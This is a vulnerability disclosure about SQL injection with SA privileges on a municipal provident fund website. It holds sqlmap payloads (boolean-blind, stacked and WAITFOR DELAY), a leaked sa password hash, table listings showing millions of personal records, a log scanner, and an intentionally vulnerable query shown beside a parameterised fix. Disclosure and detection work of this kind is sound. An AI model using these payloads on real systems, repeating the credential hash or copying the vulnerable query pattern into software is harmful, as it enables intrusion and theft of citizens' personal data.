
SQL injection (SA privileges) at a municipal housing provident fund management center, affecting 7,000,000+ account records and 580,000+ provident fund records (names, amounts, ID card numbers, employers, etc.)

2016-05-20 19:30

SQL injection (SA privileges) at a municipal housing provident fund management center, leaking 7,000,000+ account records and 580,000+ provident fund records (names, amounts, ID card numbers, employers, etc.)...

Injection point: http://**.**.**.**/List/DownLoadCenterDetails?id=5EBC88CC-A248-41FD-9703-7FD6CC454628. Running it through sqlmap showed that the query executes with SA privileges, so large amounts of sensitive data can be dumped directly, including provident fund balances, resident ID card numbers, names, employer names and more...

+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails             | 7130445 |
| dbo.Fq_LoanDetails                      |  889789 |
| dbo.Fq_FundAccountsInfo                 |  580320 |
| dbo.Im_PFAccountContrast                |  575657 |
+-----------------------------------------+---------+



Code region:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' AND 9621=9621 AND 'EhJf'='EhJf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' WAITFOR DELAY '0:0:5'--
---
[07:57:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] GIOT_QZgjj
[*] master
[*] model
[*] msdb
[*] tempdb

current database: 'GIOT_QZgjj'

current user: 'sa'

database management system users password hashes:
[*] sa [1]:
    password hash: 0x01004086ceb659f0af51ae621f0e86391ef163ba496c273d29ec
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 59f0af51ae621f0e86391ef163ba496c273d29ec

[09:10:38] [INFO] testing if current user is DBA
database management system users privileges:
[*] sa (administrator)

Database: GIOT_QZgjj
[88 tables]
+-------------------------------------+
| Bi_Company                          |
| Bi_CompanySort                      |
| Bi_Department                       |
| Bi_DicType                          |
| Bi_DicValue                         |
| Bi_EmployeeInfo                     |
| Bi_NotWorkDay                       |
| Bi_Position                         |
| Cp_OverviewManagement               |
| Cp_ProvidentFundCard                |
| Cs_LendingRates                     |
| Cs_LendingYearRates                 |
| Fq_AccountsSMS                      |
| Fq_CompanyAccountsInfo              |
| Fq_CompanyAcountsInfoPro            |
| Fq_FundAccountsInfo                 |
| Fq_FundAccountsInfoPro              |
| Fq_LoanAccount                      |
| Fq_LoanAccountContrast_V            |
| Fq_LoanAccountPro                   |
| Fq_LoanAccountProNew_V              |
| Fq_LoanAccountProNo_V               |
| Fq_LoanBank                         |
| Fq_LoanDetailSMS                    |
| Fq_LoanDetails                      |
| Fq_LoanDetailsPro                   |
| Fq_LoanHandleProgress               |
| Fq_LoanHandleProgressPro            |
| Fq_ManagementDept                   |
| Fq_PFPersonAccountProNo_V           |
| Fq_PersonAccountDetails             |
| Fq_PersonAccountDetailsPro          |
| Fq_PersonAccountNew_V               |
| Fq_WhichLinks                       |
| Ic_ComplaintsRights                 |
| Ic_ConsultingInteractive            |
| Ic_ReplyQuestion                    |
| Im_AnnouncementPublicity            |
| Im_CanGoodsProperty                 |
| Im_CategoryManagement               |
| Im_CustomerInfo                     |
| Im_DownloadCenter                   |
| Im_Floatage                         |
| Im_FundCreditBlacklist              |
| Im_GovernmentInformationDisclosure  |
| Im_LawGuide                         |
| Im_Links                            |
| Im_PFAccountContrast                |
| Im_PaymentHandlingProgressPublicity |
| Im_PoliciesRegulations              |
| Im_RotationDiagram                  |
| Im_SearchKeywords                   |
| Im_SpecialTopic                     |
| Im_VerificationManage               |
| Im_WorkDynamics                     |
| Pf_AccountContrast_V                |
| Rs_HomeServiceReservationManage     |
| Rs_ReservationManage                |
| Rs_ReservationManageDepartment      |
| Rs_ReservationNumberLimit           |
| Rs_SMSTemplates                     |
| Sa_ControlInfo                      |
| Sa_LoginControl                     |
| Sa_ParameterConfiguration           |
| Sa_Privilege_Company_Handle         |
| Sa_UpdateLog                        |
| Sa_UserInfo                         |
| Sh_ComCustomerInfo                  |
| Sh_Persom                           |
| Sh_PersonChangePayListDetail        |
| Sh_PersonFundChangeDetail           |
| Sh_Settings                         |
| bo.Sh_PersonFundChange              |
| sa_LogError                         |
| sa_LogHandle                        |
| sa_LogHandle_Report                 |
| sa_LogLoa                           |
| sa_LogLogin_Report                  |
| sa_Menu_Handle_Tree_View            |
| sa_OnLiner                          |
| sa_Role_User                        |
| sa_Role_User_v                      |
| sa_handle_Guid                      |
| sa_menu_Guid                        |
| sa_privilege_Handle                 |
| sa_privilege_Handle_v               |
| sa_role                             |
| sa_user_menu                        |
+-------------------------------------+
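As an added detection example (not part of the original report), the following scanner walks constructed IIS-style log lines and flags requests to /List/DownLoadCenterDetails whose id is not a single GUID or carries one of the payload shapes sqlmap listed above (quote plus AND n=n, stacked ;, WAITFOR DELAY, -- comment). The log field order (date time method stem query status) is an assumption.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/list/downloadcenterdetails"   # the vulnerable path from the report
GUID_RE = re.compile(r"^[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}$")
# Indicator shapes drawn from the three payload types sqlmap listed.
INDICATORS = re.compile(r"WAITFOR\s+DELAY|'\s*AND\s+\d+=\d+|;|--", re.I)

# Constructed sample log (assumed field order: date time method stem query status);
# line 1 is a legitimate request, lines 2-4 mirror the page's payloads, URL-encoded.
SAMPLE_LOG = """\
2016-05-20 07:57:29 GET /List/DownLoadCenterDetails id=5EBC88CC-A248-41FD-9703-7FD6CC454628 200
2016-05-20 07:57:30 GET /List/DownLoadCenterDetails id=225028E4-CA12-4EF0-9AD9-F817F3539525%27+AND+9621%3D9621+AND+%27EhJf%27%3D%27EhJf 200
2016-05-20 07:57:31 GET /List/DownLoadCenterDetails id=225028E4-CA12-4EF0-9AD9-F817F3539525%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 200
2016-05-20 07:57:37 GET /List/DownLoadCenterDetails id=225028E4-CA12-4EF0-9AD9-F817F3539525%27+WAITFOR+DELAY+%270%3A0%3A5%27-- 200
2016-05-20 07:58:00 GET /index.aspx - 200
"""


def analyse(line: str):
    """Return an alert dict for a suspicious request to ENDPOINT, else None."""
    parts = line.split()
    if len(parts) < 6 or parts[3].lower() != ENDPOINT:
        return None
    query = "" if parts[4] == "-" else parts[4]
    # parse_qs decodes %xx and '+', so indicators are matched on the real value
    id_value = parse_qs(query, keep_blank_values=True).get("id", [""])[0]
    indicators = INDICATORS.findall(id_value)
    reasons = []
    if not GUID_RE.match(id_value):
        reasons.append("id is not a GUID")
    if indicators:
        reasons.append("SQL injection indicators present")
    if not reasons:
        return None
    return {"time": parts[0] + " " + parts[1], "id": id_value,
            "reasons": reasons, "indicators": indicators}


def scan(log_text: str) -> list:
    """Run analyse() over every line and collect the alerts in order."""
    alerts = []
    for line in log_text.splitlines():
        alert = analyse(line)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["time"], alert["reasons"], alert["indicators"])
```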








Proof of vulnerability:

The data dumped is as follows:

Code region:
Database: GIOT_QZgjj
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails             | 7130445 |
| dbo.Fq_LoanDetails                      |  889789 |
| dbo.Fq_FundAccountsInfo                 |  580320 |
| dbo.Im_PFAccountContrast                |  575657 |
| dbo.Im_VerificationManage               |  273258 |
| dbo.Fq_AccountsSMS                      |  209707 |
| dbo.Pf_AccountContrast_V                |  120413 |
| dbo.Fq_LoanHandleProgress               |   97543 |
| dbo.Im_CustomerInfo                     |   63783 |
| dbo.Fq_LoanAccount                      |   60268 |
| dbo.Fq_LoanDetailSMS                    |   55956 |
| dbo.Fq_LoanAccountContrast_V            |   22150 |
| dbo.Fq_LoanDetailsPro                   |    4200 |
| dbo.Ic_ConsultingInteractive            |    1714 |
| dbo.Sa_LoginControl                     |    1160 |
| dbo.sa_OnLiner                          |     475 |
| dbo.sa_privilege_Handle                 |     438 |
| dbo.sa_privilege_Handle_v               |     438 |
| dbo.Ic_ReplyQuestion                    |     330 |
| dbo.Im_SpecialTopic                     |     321 |
| dbo.sa_Menu_Handle_Tree_View            |     287 |
| dbo.Im_WorkDynamics                     |     285 |
| dbo.sa_LogError                         |     252 |
| dbo.sa_handle_Guid                      |     202 |
| dbo.sa_LogHandle                        |     116 |
| dbo.Im_AnnouncementPublicity            |     114 |
| dbo.Im_CanGoodsProperty                 |     105 |
| dbo.sa_menu_Guid                        |      85 |
| dbo.Ic_ComplaintsRights                 |      84 |
| dbo.Im_PoliciesRegulations              |      74 |
| dbo.Im_CategoryManagement               |      65 |
| dbo.Sh_Settings                         |      52 |
| dbo.Rs_ReservationManage                |      50 |
| dbo.Im_LawGuide                         |      45 |
| dbo.Fq_LoanBank                         |      34 |
| dbo.Im_DownloadCenter                   |      25 |
| dbo.Im_GovernmentInformationDisclosure  |      19 |
| dbo.Cp_ProvidentFundCard                |      14 |
| dbo.Fq_ManagementDept                   |      13 |
| dbo.Im_PaymentHandlingProgressPublicity |      13 |
| dbo.sa_LogLogin_Report                  |      12 |
| dbo.Sa_UserInfo                         |      12 |
| dbo.Rs_HomeServiceReservationManage     |      11 |
| dbo.Rs_ReservationManageDepartment      |      11 |
| dbo.Bi_EmployeeInfo                     |      10 |
| dbo.Im_RotationDiagram                  |      10 |
| dbo.Rs_ReservationNumberLimit           |      10 |
| dbo.sa_Role_User                        |      10 |
| dbo.sa_Role_User_v                      |      10 |
| dbo.Im_Links                            |       9 |
| dbo.Fq_WhichLinks                       |       8 |
| dbo.Rs_SMSTemplates                     |       7 |
| dbo.Sa_ControlInfo                      |       7 |
| dbo.Sa_Privilege_Company_Handle         |       7 |
| dbo.Sa_ParameterConfiguration           |       6 |
| dbo.Im_SearchKeywords                   |       4 |
| dbo.sa_LogHandle_Report                 |       4 |
| dbo.Bi_Company                          |       3 |
| dbo.Bi_Department                       |       3 |
| dbo.Bi_DicType                          |       3 |
| dbo.Bi_DicValue                         |       3 |
| dbo.Cp_OverviewManagement               |       3 |
| dbo.Bi_CompanySort                      |       2 |
| dbo.Cs_LendingYearRates                 |       2 |
| dbo.sa_role                             |       2 |
| dbo.Sh_ComCustomerInfo                  |       2 |
| dbo.Sh_PersonChangePayListDetail        |       2 |
| dbo.Bi_NotWorkDay                       |       1 |
| dbo.Cs_LendingRates                     |       1 |
| dbo.Im_Floatage                         |       1 |
+-----------------------------------------+---------+






Fix:

Filter the input...
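As an added example (not the report's or the affected site's code), here is the pattern behind the injection point described above beside its hardened form: the id parameter is allow-listed as a single GUID and then bound as a query parameter instead of being spliced into the SQL text. It assumes the table Im_DownloadCenter (listed on the page) with assumed columns Id and Title, uses sqlite3 in memory as a stand-in for SQL Server 2005 so it runs offline, and reuses the three payloads sqlmap reported.

```python
import re
import sqlite3

SAMPLE_ID = "5EBC88CC-A248-41FD-9703-7FD6CC454628"   # the id in the reported URL
# The three payload shapes sqlmap reported against the id parameter (from the page).
PAGE_PAYLOADS = [
    "225028E4-CA12-4EF0-9AD9-F817F3539525' AND 9621=9621 AND 'EhJf'='EhJf",
    "225028E4-CA12-4EF0-9AD9-F817F3539525'; WAITFOR DELAY '0:0:5'--",
    "225028E4-CA12-4EF0-9AD9-F817F3539525' WAITFOR DELAY '0:0:5'--",
]
GUID_RE = re.compile(r"^[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}$")


def is_valid_guid(value: str) -> bool:
    """Allow-list check: the parameter must be exactly one canonical GUID."""
    return bool(GUID_RE.match(value))


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the GIOT_QZgjj database; columns are assumed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Im_DownloadCenter (Id TEXT PRIMARY KEY, Title TEXT)")
    con.execute("INSERT INTO Im_DownloadCenter VALUES (?, ?)", (SAMPLE_ID, "sample"))
    return con


def vulnerable_lookup(con: sqlite3.Connection, user_id: str):
    """The pattern behind the finding: the raw value is spliced into the SQL text,
    so a quote in user_id rewrites the WHERE clause (the boolean-blind oracle)."""
    sql = f"SELECT Title FROM Im_DownloadCenter WHERE Id = '{user_id}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def safe_lookup(con: sqlite3.Connection, user_id: str):
    """Reject anything that is not a GUID, then bind the value as a parameter;
    whatever it contains, the value can no longer alter the statement."""
    if not is_valid_guid(user_id):
        return None
    row = con.execute("SELECT Title FROM Im_DownloadCenter WHERE Id = ?",
                      (user_id.upper(),)).fetchone()
    return row[0] if row else None
```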


Source: www.wooyun.org/bugs/wooyun-2016-0191218

Views: 118746 | Comments: 0 | Tags: injection, vulnerability
